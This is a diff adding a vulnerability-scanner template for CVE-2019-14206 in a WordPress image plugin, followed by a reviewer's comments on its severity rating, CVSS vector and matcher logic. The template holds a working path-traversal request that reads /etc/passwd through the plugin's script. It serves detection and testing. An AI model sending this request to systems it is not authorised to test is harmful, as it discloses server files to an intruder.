diff --git a/http/cves/2019/CVE-2019-14206.yaml b/http/cves/2019/CVE-2019-14206.yaml
new file mode 100644
index 000000000000..a8c1d91e16f8
--- /dev/null
+++ b/http/cves/2019/CVE-2019-14206.yaml
@@ -0,0 +1,41 @@
+id: CVE-2019-14206
+
+info:
+ name: WordPress Nevma Adaptive Images <0.6.67 - Arbitrary File Deletion / LFI
+ author: cascade
+ severity: high
+ description: |
+ The WordPress Nevma Adaptive Images plugin before 0.6.67 contains unsafe handling of user input in adaptive-images-script.php, enabling arbitrary file deletion and file read. An attacker can control the path used by the cache mechanism and read sensitive files (e.g., /etc/passwd) or delete arbitrary files.
+ impact: |
+ Successful exploitation can read sensitive files or delete arbitrary files accessible to the web server user, leading to information disclosure, denial of service, or further compromise.
+ remediation: |
+ Update the plugin to version 0.6.67 or later where input sanitization was added.
+ reference:
+ - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
+ - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
+ classification:
+ cve-id: CVE-2019-14206
+ cwe-id: CWE-22
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
+ cvss-score: 9.1
+ epss-score: 0.04139
+ epss-percentile: 0.91415
+ cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 1
+ verified: true
+ tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,adaptive-images
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "regex('root:.*:0:0:', body)"
+ - 'contains(body, "adaptive-images")'
+ - "status_code == 200"
+ condition: and
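Review bot: `severity: high` in the `info` block disagrees with the `classification` block, where `cvss-score: 9.1` falls in the critical band, so anyone filtering scan results on severity will rank this finding below its own score. I would change it to `severity: critical`, or state in the description why it is rated lower. The vector also records `C:N`, while the only behaviour the request and matchers test is a file read. A short comment above `http:` saying the template checks the read path only and appears not to exercise deletion would help operators judge whether it is safe to run. In the matchers, `contains(body, "adaptive-images")` is ANDed with the passwd regex, so if the script returns the file verbatim that string may be absent and vulnerable hosts would be missed. Please confirm it against the verified target or drop that condition.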